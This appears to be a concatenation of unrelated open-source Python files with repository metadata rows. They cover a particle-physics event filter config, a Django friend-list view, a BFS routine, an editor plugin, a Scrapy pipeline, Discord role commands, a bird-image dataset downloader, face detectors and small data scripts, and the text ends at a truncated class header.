## topSequence.VH_DV_ElectronFilter.cutAuthor=primRPVLLDESDM.VH_DV_electronFilterFlags.cutAuthor
## topSequence.VH_DV_ElectronFilter.electronCollectionName=primRPVLLDESDM.VH_DV_electronFilterFlags.electronCollectionName
electronFilterName = 'VH_DV_DiElectronFilter'
cutString="count( "
cutString+= primRPVLLDESDM.VH_DV_DielectronFilterFlags.electronCollectionName
cutString+=".pt > "
cutString += str(primRPVLLDESDM.VH_DV_DielectronFilterFlags.cutEtMin)
cutString+= " && abs("
cutString+= primRPVLLDESDM.VH_DV_DielectronFilterFlags.electronCollectionName
cutString+=".eta) < "
cutString+= str(primRPVLLDESDM.VH_DV_DielectronFilterFlags.cutEtaMax)
cutString+=" ) > 1"
topSequence += CutAlg(electronFilterName,
Cut=cutString)
filtersToBookkeep+=["VH_DV_DiElectronFilter"]
## topSequence += ElectronFilter(electronFilterName)
## topSequence.VH_DV_DiElectronFilter.cutEtMin = primRPVLLDESDM.VH_DV_DielectronFilterFlags.cutEtMin
## topSequence.VH_DV_DiElectronFilter.cutEtaMax = primRPVLLDESDM.VH_DV_DielectronFilterFlags.cutEtaMax
## topSequence.VH_DV_DiElectronFilter.cutIsEM=primRPVLLDESDM.VH_DV_DielectronFilterFlags.cutIsEM
## topSequence.VH_DV_DiElectronFilter.cutAuthor=primRPVLLDESDM.VH_DV_DielectronFilterFlags.cutAuthor
## topSequence.VH_DV_DiElectronFilter.electronCollectionName=primRPVLLDESDM.VH_DV_DielectronFilterFlags.electronCollectionName
## topSequence.VH_DV_DiElectronFilter.minNumberPassed = 2
combinedOfflineFilterName = "VH_DV_CombinedWOfflineFilter"
topSequence += LogicalFilterCombiner( combinedOfflineFilterName )
cmdstring = "VH_DV_ElectronFilter and VH_DV_JetMetFilter"
topSequence.VH_DV_CombinedWOfflineFilter.cmdstring=cmdstring
filtersToBookkeep+=[combinedOfflineFilterName]
combinedOfflineFilterName = "VH_DV_CombinedZOfflineFilter"
topSequence += LogicalFilterCombiner( combinedOfflineFilterName )
cmdstring = "VH_DV_DiElectronFilter and VH_DV_JetFilter"
topSequence.VH_DV_CombinedZOfflineFilter.cmdstring=cmdstring
filtersToBookkeep+=[combinedOfflineFilterName]
combinedOfflineFilterName = "VH_DV_CombinedEgammaOfflineFilter"
topSequence += LogicalFilterCombiner( combinedOfflineFilterName )
cmdstring = "VH_DV_CombinedWOfflineFilter or VH_DV_CombinedZOfflineFilter"
topSequence.VH_DV_CombinedEgammaOfflineFilter.cmdstring=cmdstring
filtersToBookkeep+=[combinedOfflineFilterName]
########### combine the trigger and offline filters
VH_DVCombinedFilter=LogicalFilterCombiner("VH_DVCombinedFilter")
if rec.triggerStream() == "Muons":
topSequence+=VH_DVCombinedFilter
topSequence.VH_DVCombinedFilter.cmdstring="VH_DV_CombinedTriggerFilter and VH_DV_CombinedMuonsOfflineFilter"
elif rec.triggerStream() == "Egamma":
topSequence+=VH_DVCombinedFilter
topSequence.VH_DVCombinedFilter.cmdstring="VH_DV_CombinedTriggerFilter and VH_DV_CombinedEgammaOfflineFilter"
else:
combinedOfflineFilterName = "VH_DV_CombinedEgammaMuonsOfflineFilter"
topSequence += LogicalFilterCombiner( combinedOfflineFilterName )
cmdstring = "VH_DV_CombinedEgammaOfflineFilter or VH_DV_CombinedMuonsOfflineFilter"
topSequence.VH_DV_CombinedEgammaMuonsOfflineFilter.cmdstring=cmdstring
filtersToBookkeep+=[combinedOfflineFilterName]
topSequence+=VH_DVCombinedFilter
topSequence.VH_DVCombinedFilter.cmdstring="VH_DV_CombinedTriggerFilter and VH_DV_CombinedEgammaMuonsOfflineFilter"
########### add this to the global top filter
if topCmdString.__len__() > 0:
topCmdString+=" or "
pass
topCmdString+="VH_DVCombinedFilter"
filtersToBookkeep+=["VH_DVCombinedFilter"]
| rushioda/PIXELVALID_athena | athena/PhysicsAnalysis/SUSYPhys/LongLivedParticleDPDMaker/share/PhysDESDM_VH_DV.py | PhysDESDM_VH_DV.py | py | 9,185 | python | en | code | 1 | github-code | 13 |
7159983981 | from django.http import HttpResponse
from django.shortcuts import render
#from conf import access_token,refresh_token
from codechef_mayukh45.MAIN import get_college
import sys
#username = ""
#friends = []
own_college = 0
friends_college = 0
import time
def index(request):
global own_college
global friends_college
new_friend = ""
friends = {}
username = str(request.GET.get('username'))
# print("username creation "+str(username))
if len(str(username)) > 0 and str(username) != "None":
own_college = get_college(str(username))
from database import data
del sys.modules['database']
#print(str(data))
keys = list(data.keys())
if keys.count(username)==0 and username!="None":
data[username]={'friends':{},"college":own_college}
keys.append(username)
if request.method=="POST":
new_friend = str(request.POST.get('new_friend'))
print(new_friend)
if len(str(new_friend))>0 and str(new_friend)!="None" and str(username)!=("None"):
#print("LOL"*10)
#print(username)
friends_college = get_college(new_friend)
if friends_college != -1 and own_college!=-1:
data[username]['friends'][str(new_friend)]=friends_college
#print(data)
f = open('database.py','w')
f.write("data = "+str(data))
f.close()
# print("*"*100)
# print("new_friend"+str(new_friend))
# print(str(data))
if keys.count(username)>0:
# print(username + "io")
friends = list(data[username]['friends'].keys())
null = False
if str(username) == "None" or len(str(username))==0 and friends_college!=-1:
null = True
#print("creation"+str(username))
# print("friends "+str(friends))
context = {'friends' : friends,'username':username,'own_college':own_college,'friend_college':friends_college,"null":null}
return render(request,"creation.html", context)
| mayukh45/Ranklist_App | codechef_mayukh45/creation/views.py | views.py | py | 1,999 | python | en | code | 0 | github-code | 13 |
1590015 | from collections import deque
def bfs(graph: dict[int, list[int]], start: int) -> list[int]:
"""
V = number of vertices in the graph
E = number of edges in the graph
-------------
Time: O(V + E)
Space: O(V)
"""
q = deque([start])
visited = {start}
res = []
while q:
u = q.popleft()
res.append(u)
for v in graph[u]:
if v not in visited:
q.append(v)
visited.add(v)
return res
G = {
1: [2, 3],
2: [1, 3, 6, 7],
3: [1, 2, 4, 5],
4: [3, 5],
5: [3, 4],
6: [2, 7],
7: [2, 6],
}
print(bfs(G, 1)) # [1, 2, 3, 6, 7, 4, 5]
print(bfs(G, 3)) # [3, 1, 2, 4, 5, 6, 7]
| ironwolf-2000/Algorithms | Graphs/Traversals/BFS/bfs.py | bfs.py | py | 708 | python | en | code | 2 | github-code | 13 |
2244821279 | """
Overview
========
This plugin attempt to set the actual project attribute
for the current AreaVi instance. It tries to find
project folders like .git, .svn, .hg or a ._ that's
a vy project file.
"""
from os.path import exists, dirname, join
from vyapp.stderr import printd
def get_sentinel_file(path, *args):
"""
"""
tmp = path
while True:
tmp = dirname(tmp)
for ind in args:
if exists(join(tmp, ind)):
return tmp
elif tmp == dirname(tmp):
return ''
class Project:
sentinels = ('.git', '.svn', '.hg', '._')
def __init__(self, area):
self.area = area
area.install('fstmt', (-1, '<<LoadData>>', self.set_path),
(-1, '<<SaveData>>', self.set_path))
@classmethod
def c_sentinels(cls, *sentinels):
cls.sentinels = sentinels
printd('Project - Setting sentinels = ', cls.sentinels)
def set_path(self, event):
"""
Set the project root automatically.
"""
self.area.project = get_sentinel_file(
self.area.filename, *Project.sentinels)
printd('Project - Setting project path = ', self.area.project)
install = Project
| vyapp/vy | vyapp/plugins/project.py | project.py | py | 1,236 | python | en | code | 1,145 | github-code | 13 |
23015863407 | # Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# useful for handling different item types with a single interface
from itemadapter import ItemAdapter
class WeatherPipeline(object):
def open_spider(self,spider):
# 首先用写入的方式创建或者打开一个普通文件用于存储爬取到的数据
self.f = open(r"result.txt","wb")
def process_item(self, item, spider):
line = str(item['date'] + item['day'] + item['weather'] + item['Minimum_temperature'] + item['Maxmum_temperature'] + item['wind_direction']) + "\n"
line = line.replace('\'','')
line = line.replace('[','')
line = line.replace(']','')
line = line.encode()
self.f.write(line)
return item
def close_spider(self,spider):
#关闭文件
print("文件关闭")
self.f.close()
| leng-bing-bing/homework | 6/weather/weather/pipelines.py | pipelines.py | py | 1,045 | python | en | code | 1 | github-code | 13 |
70161175699 | from __future__ import annotations
from abc import ABC, abstractmethod
from typing import Type, Tuple
import discord
from difflib import get_close_matches
from disputils import BotMultipleChoice
class OSBcmd(ABC):
"""
Command Patter Interface.
"""
@abstractmethod
async def execute(self, **kwargs):
pass
class Ping(OSBcmd):
"""
A simple ping command.
"""
async def execute(self, ctx) -> None:
await ctx.send("pog")
class Add(OSBcmd):
"""
Allows users to add themselves to a role.
Users can only add themselves to roles that have a certian permission number.
This is so users cannot add themselves to any admin groups, by default I've made the
permission number the default new role number found in osb.py but this can easily be changed.
"""
async def execute(self, ctx, perm_num, role: discord.Role) -> None:
user = ctx.message.author
if role is None:
await ctx.send(f'That role dose not exist {user.mention}')
elif role.permissions.value != perm_num:
await ctx.send('You do not have permission to add this role')
elif role in user.roles:
await ctx.send(f"You cannot add a role you already have {user.mention}")
else:
user = ctx.message.author
await user.add_roles(role)
await ctx.send(f'Added {role} to {user.mention}')
class Remove(OSBcmd):
"""
Allows users to remove themselves to a role (that has a certain permission number).
"""
async def execute(self, ctx, perm_num, role) -> None:
role = discord.utils.get(ctx.guild.roles, name=role)
user = ctx.message.author
if role is None:
await ctx.send(f'That role dose not exist {user.mention}')
elif role.permissions.value != perm_num:
await ctx.send('You do not have permission to remove this role')
elif role not in user.roles:
await ctx.send(f"You cannot remove a role you don't have {user.mention}")
else:
await user.remove_roles(role)
await ctx.send(f"Removed {role} from {user.mention}")
class Search:
"""
Allow users to search courses, and add themseleves using a choice box.
"""
async def execute(self, ctx, perm_number, role):
user = ctx.message.author
roles = ctx.guild.roles
roles = [i for i in roles if i.permissions.value == perm_number and i.name != '@everyone']
role_names = get_close_matches(role, [i.name for i in roles])
if not role_names:
await ctx.send(f"Could not find any roles close to that name... {user.mention}")
return None
if len(role_names) > 5:
del role_names[5:]
multiple_choice = BotMultipleChoice(ctx, role_names, "Search Results:")
choice = await multiple_choice.run()
choice = choice[0]
if choice:
for i in roles:
if choice == i.name:
choice = i
break
else:
await multiple_choice.quit(f"Sorry you did not see the class you were looking for {user.mention}!")
return None
await multiple_choice.quit()
return choice
| jarrett-m/OnStudy_Bot | source/osb_commands.py | osb_commands.py | py | 3,281 | python | en | code | 0 | github-code | 13 |
5832468796 | #!/usr/bin/env python
# coding: utf-8
# This reads from HD5 files and sends over network.
# This file sends drone position data over a server as x, y, z by sending at the right timestamp.
# Change the HOST and PORT variables accordingly.
import h5py
import numpy as np
import math
import struct
import time
import socket
import json
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--HOST", help="Host to stream the position data from")
parser.add_argument("--PORT", help="Port to stream the position data from")
args = parser.parse_args()
HOST = args.HOST
PORT = args.PORT
if args.HOST == None:
HOST = 'LOCALHOST'
if args.PORT == None:
PORT = 50008
try:
PORT = int(PORT)
except ValueError:
print("PORT variable must be an integer")
print("Exitting now...")
exit()
print("Reading in data...")
f = h5py.File('RunData.h5', 'r')
x = f.keys()
pos_data = f["posData"]
print("Connecting...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.bind((HOST, PORT))
s.connect((HOST, PORT))
offset = pos_data[0][0]
start = time.time()
print("Sending")
for i in range(len(pos_data)):
while(time.time() - start < pos_data[i][0] - offset):
time.sleep(0.1)
# sending message in format [label]:[timestamp]:data\n
xyz = "Drone:" + str(pos_data[i][0]) + ":" + str(pos_data[i][1]) + "," + str(pos_data[i][2]) + "," + str(pos_data[i][3]) + "\n"
print("Num: " + str(i) + ": "+ xyz)
s.send(xyz.encode())
s.close()
f.close()
| immersive-command-system/RadiationVisualization | LBL/GeneratePosData.py | GeneratePosData.py | py | 1,666 | python | en | code | 3 | github-code | 13 |
10844205105 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Assignment in BMP course - Program Mapping Table parser
Author: Jakub Lukac
E-mail: xlukac09@stud.fit.vutbr.cz
Created: 22-10-2019
Testing: python3.6
"""
import sys
from descriptor import parse_descriptors
from psi import PSI
class PMT(PSI):
def __init__(self, data):
# parse program-specific information frame
super().__init__(data)
if not self.section_syntax_indicator:
print("PMT Error: Program", format(self.id, "#06x"), "Section syntax indicator bit not set to 1.",
file=sys.stderr)
if self.private_bit:
print("PMT Error: Program", format(self.id, "#06x"), "Private bit not set to 0.", file=sys.stderr)
self.__parse_pmt_table(self.table_data)
def __parse_pmt_table(self, data):
position_indicator = 0
# 3 bits reserved bits
reserved = (data[position_indicator] & 0xe0) >> 5
if reserved != 0x07:
print("PMT Error: Program", format(self.id, "#06x"), "Reserved bits not set to 0x07.",
file=sys.stderr)
# 13 bits PCR PID
self.pcr_pid = int.from_bytes(data[position_indicator:position_indicator + 2],
byteorder="big") & 0x1fff
position_indicator += 2
# 4 bits reserved bits
reserved = (data[position_indicator] & 0xf0) >> 4
if reserved != 0x0f:
print("PMT Error: Program", format(self.id, "#06x"), "Reserved bits not set to 0x0f.",
file=sys.stderr)
# 2 bits program info length unused bits
unused_bits = (data[position_indicator] & 0x0c) >> 2
if unused_bits != 0x00:
print("PMT Error: Program", format(self.id, "#06x"), "Section length unused bits not set to 0.",
file=sys.stderr)
# 10 bits program info length
program_info_length = int.from_bytes(data[position_indicator:position_indicator + 2], byteorder="big") & 0x03ff
position_indicator += 2
# variable bits read program descriptors
self.program_descriptors = parse_descriptors(
data[position_indicator:position_indicator + program_info_length])
position_indicator += program_info_length
# elementary stream info loop
self.stream_type = []
self.elementary_pids = []
self.elementary_descriptors = []
while position_indicator < len(data):
# 8 bits elementary stream type
self.stream_type.append(data[position_indicator])
position_indicator += 1
# 3 bits reserved bits
reserved = (data[position_indicator] & 0xe0) >> 5
if reserved != 0x07:
print("PMT Error: Program", format(self.id, "#06x"), "Reserved bits not set to 0x07.", file=sys.stderr)
# 13 bits elementary stream pid
self.elementary_pids.append(int.from_bytes(data[position_indicator:position_indicator + 2],
byteorder="big") & 0x1fff)
position_indicator += 2
# 4 bits reserved bits
reserved = (data[position_indicator] & 0xf0) >> 4
if reserved != 0x0f:
print("PMT Error: Program", format(self.id, "#06x"), "Reserved bits not set to 0x0f.",
file=sys.stderr)
# 2 bits program info length unused bits
unused_bits = (data[position_indicator] & 0x0c) >> 2
if unused_bits != 0x00:
print("PMT Error: Program", format(self.id, "#06x"), "Section length unused bits not set to 0.",
file=sys.stderr)
# 10 bits elementary stream info length
elementary_info_length = int.from_bytes(data[position_indicator:position_indicator + 2],
byteorder="big") & 0x03ff
position_indicator += 2
# variable bits read descriptors
self.elementary_descriptors.append(
parse_descriptors(data[position_indicator:position_indicator + elementary_info_length]))
position_indicator += elementary_info_length
def __str__(self):
pmt_str = super().__str__()
pmt_str += "Program number: {self.id:#06x}\n" \
"Stream type: [".format(self=self) \
+ ", ".join([format(id, "#04x") for id in self.stream_type]) + \
"]\n" \
"ES PIDs: [" \
+ ", ".join([format(id, "#06x") for id in self.elementary_pids]) + \
"]\n"
return pmt_str
| cubolu/School-Projects | Python/BMS/dvb-t/pmt.py | pmt.py | py | 4,701 | python | en | code | 0 | github-code | 13 |
14530341692 | import pandas as pd
import networkx as nx
import numpy as np
import time
def build_year(year):
print('start')
file_read = 'pruned_data/pruned_data_{}.csv'.format(year)
df_actual = pd.read_csv(file_read)
# reformat so triangle generator can differentiate
df_actual['defense'] = 'Defense_' + df_actual['opp_id']
#change this so its the same as toy example
df_actual.columns = ['player' if x == 'player_id' else x for x in df_actual.columns]
# add per min stats
stats = ['pts', 'trb', 'ast', 'blk', 'stl']
for stat in stats:
new_col = stat + '_per_min'
df_actual[new_col] = df_actual.apply(lambda row: 0 if row['mp'] == 0 else row[stat] / row['mp'], axis=1)
# build df_possible
# initial player-defense pairs
defense_list = []
player_list = []
print('build combos')
for defense in df_actual['defense'].unique():
for player in df_actual['player'].unique():
defense_list.append(defense)
player_list.append(player)
data_dict = {'defense' : defense_list, 'player' : player_list}
df_possible = pd.DataFrame(data=data_dict)
# real results from df_actual -> df_possible
# apply above tests to all rows
stats_per_min = ['pts_per_min', 'trb_per_min', 'ast_per_min', 'blk_per_min', 'stl_per_min']
print('{} num of rows: {}'.format(year, len(df_possible)))
for index, row in df_possible.iterrows():
if index % 1000 == 0:
print('index: {}'.format(index))
print(time.time())
df_filtered = df_actual[(df_actual['player'] == row['player']) & (df_actual['defense'] == row['defense'])]
df_possible.loc[index, 'times_played'] = len(df_filtered)
if len(df_filtered) == 0:
for stat in stats_per_min:
df_possible.loc[index, stat] = 0.0
else:
for stat in stats_per_min:
df_possible.loc[index, stat] = df_filtered[stat].mean()
# save csv
file_name = 'df_possibles/df_possible_{}.csv'.format(year)
df_possible.to_csv(file_name, index=False)
years = [2015, 2016, 2017]
for year in years:
build_year(year)
| abeard1/IndependentStudy | src/build_df_possibles.py | build_df_possibles.py | py | 2,229 | python | en | code | 0 | github-code | 13 |
6991250955 | import pandas as pd
import numpy as np
data = pd.read_csv("raions.csv")
cat = ["young_", "work_", "ekder_"]
man = ["all", "male", "female"]
tar = "raion_popul"
for i in cat:
for j in man:
data[i + j] = data[i + j] / data[tar]
data.to_csv("raions_popul_percentaged.csv", index=None)
| ZiyaoLi/KaggleSberbank | codes_and_preprocessed_data/preproc_&_feature_eng_codes/cnt2pct_raion_popul.py | cnt2pct_raion_popul.py | py | 298 | python | en | code | 0 | github-code | 13 |
27563472500 | #############################################
# CSC 242 Section 602 Spring 2017
# Lab 3: User-defined classes
#
# LEXUS NGUYEN
#
# Fill in the 4 methods below. Also,
# be sure to define the distance method
# in the Point class (in the point.py file)
#############################################
from point import *
class Triangle:
# make a triangle whose corners are defined by the points p1, p2, and p3
def __init__(self, p1, p2, p3):
self.p1 = p1 # change these
self.p2 = p2
self.p3 = p3
self.p1top2 = p1.distance(p2)
self.p2top3 = p2.distance(p3)
self.p3top1 = p3.distance(p1)
# this method is complete. You do not need to write or modify it.
def __str__(self):
return '({},{},{})'.format(self.p1, self.p2, self.p3)
# determine if the points p1, p2, and p3 make a triangle. They
# do not if there is a straight line that connects all 3 points.
def is_triangle(self):
if self.p1top2 + self.p2top3 > self.p3top1:
if self.p2top3 + self.p3top1 > self.p1top2:
if self.p3top1 + self.p1top2 > self.p2top3:
return True
else:
return False
else:
return False
else:
return False
# return the perimeter of the triangle
def perimeter(self):
self.p = self.p1top2 + self.p2top3 + self.p3top1
return self.p
# return the area of the triangle. Please see the lab write-up
# for the formula to compute the area.
def area(self):
s = 0.5 * self.p
area = sqrt(s*(s-self.p1top2)*(s-self.p2top3)*(s-self.p3top1))
return area
| nguyenlexus/work | CSC242/triangle.py | triangle.py | py | 1,764 | python | en | code | 0 | github-code | 13 |
37502785864 | """
@author: Hayeon Lee
2020/02/19
Script for downloading, and reorganizing CUB few shot
Run this file as follows:
python get_data.py
"""
import pickle
import os
import numpy as np
from tqdm import tqdm
import requests
import tarfile
from PIL import Image
import glob
import shutil
import pickle
def download_file(url, filename):
"""
Helper method handling downloading large files from `url`
to `filename`. Returns a pointer to `filename`.
"""
chunkSize = 1024
r = requests.get(url, stream=True)
with open(filename, 'wb') as f:
pbar = tqdm( unit="B", total=int( r.headers['Content-Length'] ) )
for chunk in r.iter_content(chunk_size=chunkSize):
if chunk: # filter out keep-alive new chunks
pbar.update (len(chunk))
f.write(chunk)
return filename
if not os.path.exists("CUB_200_2011.tgz"):
print("Downloading CUB_200_2011.tgz\n")
download_file('http://www.vision.caltech.edu/visipedia-data/CUB-200-2011/CUB_200_2011.tgz','CUB_200_2011.tgz')
print("Downloading done.\n")
else:
print("Dataset already downloaded. Did not download twice.\n")
if not os.path.exists("CUB_200_2011"):
tarname = "CUB_200_2011.tgz"
print("Untarring: {}".format(tarname))
tar = tarfile.open(tarname)
tar.extractall()
tar.close()
print("Removing original CUB_200_2011.tgz")
else:
print("CUB_200_2011 folder already exists. Did not untarring twice\n")
print("Generate preprocessed valid.npy data")
with open('val_cls.pkl', 'rb') as f:
data = pickle.load(f)
x_lst = [[] for _ in range(len(data))]
for c, x_per_cls in enumerate(tqdm(data)):
for x_path in x_per_cls:
img = Image.open(
os.path.join('CUB_200_2011', 'images', x_path)).resize((84, 84))
img = np.array(img)
if img.shape == (84, 84, 3):
x_lst[c].append(img / 255.0)
x_lst[c] = np.array(x_lst[c])
np.save('valid.npy', np.array(x_lst))
print("Done")
print("Generate preprocessed test.npy data")
with open('test_cls.pkl', 'rb') as f:
data = pickle.load(f)
x_lst = [[] for _ in range(len(data))]
for c, x_per_cls in enumerate(tqdm(data)):
for x_path in x_per_cls:
img = Image.open(
os.path.join('CUB_200_2011', 'images', x_path)).resize((84, 84))
img = np.array(img)
if img.shape == (84, 84, 3):
x_lst[c].append(img / 255.0)
x_lst[c] = np.array(x_lst[c])
np.save('test.npy', np.array(x_lst))
print("Done")
# print("Removing original CUB_200_2011")
# os.remove('CUB_200_2011.tgz')
# shutil.rmtree('CUB_200_2011', ignore_errors=True)
# os.remove('attributes.txt')
| YuanWanglll/l2b | data/cub/get_data.py | get_data.py | py | 2,652 | python | en | code | null | github-code | 13 |
9984220361 | # -*- coding: utf-8 -*-
###############################################
#created by : lxy
#Time: 2018/06/28 14:09
#project: Face recognize
#company: Senscape
#rversion: 0.1
#tool: python 2.7
#modified:
#description opencv face detector
####################################################
import os
import sys
import cv2
import matplotlib.pyplot as plt
import numpy as np
import time
import sys
sys.path.append('.')
sys.path.append('/home/lxy/caffe/python')
os.environ['GLOG_minloglevel'] = '2'
import tools_matrix as tools
import caffe
sys.path.append(os.path.join(os.path.dirname(__file__),'../configs'))
from config import cfgs as config
class FaceDetector_Opencv(object):
def __init__(self,model_path):
self.detection_model = cv2.CascadeClassifier(model_path)
print("load model over")
def detectFace(self,img):
gray_image = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
#rgb_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
faces = self.detection_model.detectMultiScale(gray_image, 1.3, 5,minSize=(130,130),maxSize=(900,900))
#results = detector.detect_face(img)
boxes = []
for face_coordinates in faces:
boxes.append(face_coordinates)
if len(boxes)>0:
boxes = np.asarray(boxes)
boxes[:,2] = boxes[:,0] +boxes[:,2]
boxes[:,3] = boxes[:,1] +boxes[:,3]
return boxes
else:
return []
def draw_box(self,img,box,color=(255,0,0)):
#(row,col,cl) = np.shape(img)
#b = board_img(box,col,row)
cv2.rectangle(img, (int(box[0]), int(box[1])), (int(box[2]+box[0]), int(box[3]+box[1])), color)
def add_label(self,img,bbox,label,color=(255,0,0)):
num = bbox.shape[0]
font = cv2.FONT_HERSHEY_COMPLEX_SMALL
font_scale =1
thickness = 1
for i in range(num):
x1,y1,w,h = int(bbox[i,0]),int(bbox[i,1]),int(bbox[i,2]),int(bbox[i,3])
x2 = x1 + w
y2 = y1 + h
cv2.rectangle(img,(x1,y1),(x2,y2),color,1)
#score_label = str('{:.2f}'.format(bbox[i,4]))
score_label = label
size = cv2.getTextSize(score_label, font, font_scale, thickness)[0]
if y1-int(size[1]) <= 0:
#cv2.rectangle(img, (x1, y2), (x1 + int(size[0]), y2+int(size[1])), color)
cv2.putText(img, score_label, (x1,y2+size[1]), font, font_scale, color, thickness)
else:
#cv2.rectangle(img, (x1, y1-int(size[1])), (x1 + int(size[0]), y1), (255, 0, 0))
cv2.putText(img, score_label, (x1,y1), font, font_scale, color, thickness)
class MTCNNDet(object):
def __init__(self,min_size,threshold,model_dir):
self.test = 1
self.load = 1
self.load_model(model_dir)
self.min_size = min_size
self.threshold = threshold
caffe.set_device(0)
caffe.set_mode_gpu()
def load_model(self,model_dir):
test_ = self.test
load_ = self.load
if load_ :
deploy = '12net.prototxt'
caffemodel = '12net.caffemodel'
else:
deploy = 'PNet.prototxt'
caffemodel = 'PNet.caffemodel'
deploy = os.path.join(model_dir,deploy)
caffemodel = os.path.join(model_dir,caffemodel)
self.net_12 = caffe.Net(deploy,caffemodel,caffe.TEST)
if load_:
deploy = '24net.prototxt'
caffemodel = '24net.caffemodel'
else:
deploy = 'RNet.prototxt'
caffemodel = 'RNet.caffemodel'
deploy = os.path.join(model_dir,deploy)
caffemodel = os.path.join(model_dir,caffemodel)
self.net_24 = caffe.Net(deploy,caffemodel,caffe.TEST)
if load_:
deploy = '48net.prototxt'
caffemodel = '48net.caffemodel'
else:
deploy = "onet.prototxt"
caffemodel = "onet.caffemodel"
deploy = os.path.join(model_dir,deploy)
caffemodel = os.path.join(model_dir,caffemodel)
self.net_48 = caffe.Net(deploy,caffemodel,caffe.TEST)
def PNet_(self,caffe_img):
origin_h,origin_w,ch = caffe_img.shape
scales = tools.calculateScales(caffe_img,self.min_size)
out = []
for scale in scales:
hs = int(origin_h*scale)
ws = int(origin_w*scale)
#print(hs,ws)
if self.test:
scale_img = cv2.resize(caffe_img,(ws,hs))
scale_img = np.swapaxes(scale_img, 0, 2)
self.net_12.blobs['data'].reshape(1,3,ws,hs)
else:
scale_img = cv2.resize(caffe_img,(ws,hs))
scale_img = np.transpose(scale_img, (2,0,1))
self.net_12.blobs['data'].reshape(1,3,hs,ws)
scale_img = np.asarray(scale_img,dtype=np.float32)
self.net_12.blobs['data'].data[...]=scale_img
out_ = self.net_12.forward()
out.append(out_)
image_num = len(scales)
rectangles = []
for i in range(image_num):
cls_prob = out[i]['prob1'][0][1]
if self.test:
roi = out[i]['conv4-2'][0]
#roi = out[i]['conv4_2'][0]
else:
roi = out[i]['conv4_2'][0]
out_h,out_w = cls_prob.shape
out_side = max(out_h,out_w)
rectangle = tools.detect_face_12net(cls_prob,roi,out_side,1/scales[i],origin_w,origin_h,self.threshold[0])
rectangles.extend(rectangle)
rectangles_box = tools.NMS(rectangles,0.7,'iou')
return rectangles_box
def RNet_(self,caffe_img,rectangles):
origin_h,origin_w,ch = caffe_img.shape
self.net_24.blobs['data'].reshape(len(rectangles),3,24,24)
crop_number = 0
for rectangle in rectangles:
crop_img = caffe_img[int(rectangle[1]):int(rectangle[3]), int(rectangle[0]):int(rectangle[2])]
scale_img = cv2.resize(crop_img,(24,24))
if self.test:
scale_img = np.swapaxes(scale_img, 0, 2)
else:
scale_img = np.transpose(scale_img,(2,0,1))
scale_img = np.asarray(scale_img,dtype=np.float32)
self.net_24.blobs['data'].data[crop_number] =scale_img
crop_number += 1
out = self.net_24.forward()
cls_prob = out['prob1']
if self.test:
roi_prob = out['conv5-2']
#roi_prob = out['bbox_fc']
#pts_prob = out['landmark_fc']
else:
roi_prob = out['bbox_fc']
rectangles_box = tools.filter_face_24net(cls_prob,roi_prob,rectangles,origin_w,origin_h,self.threshold[1])
#rectangles_box = tools.filter_face_48net(cls_prob,roi_prob,pts_prob,rectangles,origin_w,origin_h,self.threshold[1])
return rectangles_box
def ONet_(self,caffe_img,rectangles):
origin_h,origin_w,ch = caffe_img.shape
self.net_48.blobs['data'].reshape(len(rectangles),3,48,48)
crop_number = 0
for rectangle in rectangles:
crop_img = caffe_img[int(rectangle[1]):int(rectangle[3]), int(rectangle[0]):int(rectangle[2])]
scale_img = cv2.resize(crop_img,(48,48))
if self.test:
scale_img = np.swapaxes(scale_img, 0, 2)
else:
scale_img = np.transpose(scale_img,(2,0,1))
scale_img = np.asarray(scale_img,dtype=np.float32)
self.net_48.blobs['data'].data[crop_number] =scale_img
crop_number += 1
out = self.net_48.forward()
cls_prob = out['prob1']
if self.test:
roi_prob = out['conv6-2']
pts_prob = out['conv6-3']
#roi_prob = out['bbox_fc']
#pts_prob = out['landmark_fc']
else:
roi_prob = out['bbox_fc']
pts_prob = out['landmark_fc']
rectangles_box = tools.filter_face_48net(cls_prob,roi_prob,pts_prob,rectangles,origin_w,origin_h,self.threshold[2])
return rectangles_box
def detectFace(self,img):
#img = cv2.imread(img_path)
img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)
caffe_img = (img.copy()-127.5)/128
#origin_h,origin_w,ch = caffe_img.shape
t = time.time()
rectangles = self.PNet_(caffe_img)
if config.onet_out:
rectangles_back = rectangles
if len(rectangles)==0 or config.pnet_out:
return rectangles
if config.time:
print("Pnet proposals ",len(rectangles))
t1 = time.time()-t
t = time.time()
rectangles = self.RNet_(caffe_img,rectangles)
t2 = time.time()-t
t = time.time()
if len(rectangles)==0 or config.rnet_out:
return rectangles
if config.onet_out:
rectangles = self.ONet_(caffe_img,rectangles_back)
else:
rectangles = self.ONet_(caffe_img,rectangles)
t3 = time.time()-t
if config.time:
print("time cost " + '{:.3f}'.format(t1+t2+t3) + ' pnet {:.3f} rnet {:.3f} onet{:.3f}'.format(t1, t2,t3))
return rectangles
| jimeffry/face-anti-spoofing | src/face_test/Detector.py | Detector.py | py | 9,170 | python | en | code | 37 | github-code | 13 |
74005965139 | import importlib
import logging
from collections import defaultdict
from axel import Event
from hmcs import config
log = logging.getLogger(__name__)
class PluginManager():
def __init__(self):
self.system_init = Event()
self.socket_event_received = Event()
self.socket_event_received += self._on_socket_event_received
self._socket_event_subscribers = defaultdict(list)
self._plugins = []
def _import_class(self, full_path):
path, class_name = full_path.rsplit('.', 1)
return getattr(importlib.import_module(path), class_name)
def init_plugins(self):
for name, path in config.PLUGINS_ENABLED.items():
cls = self._import_class(path)
obj = cls(self, config.PLUGIN_CONFIG.get(name, {}))
obj.register()
self._plugins.append(obj)
self.system_init()
def subscribe_to_socket_event(self, event_name, callback):
assert callable(callback)
self._socket_event_subscribers[event_name].append(callback)
def _on_socket_event_received(self, event_name, data):
for callback in self._socket_event_subscribers[event_name]:
try:
callback(data)
except:
log.exception(
'Failed to call method %s for event %s',
callback,
event_name,
)
class PluginBase():
def __init__(self, manager, plugin_config):
self._manager = manager
self._config = plugin_config
def register(self):
"""
Plugins should do some initialization here, like subscribe to events.
"""
| Flid/hmcs | server/hmcs/plugins/base.py | base.py | py | 1,682 | python | en | code | 0 | github-code | 13 |
6693206925 | class Solution:
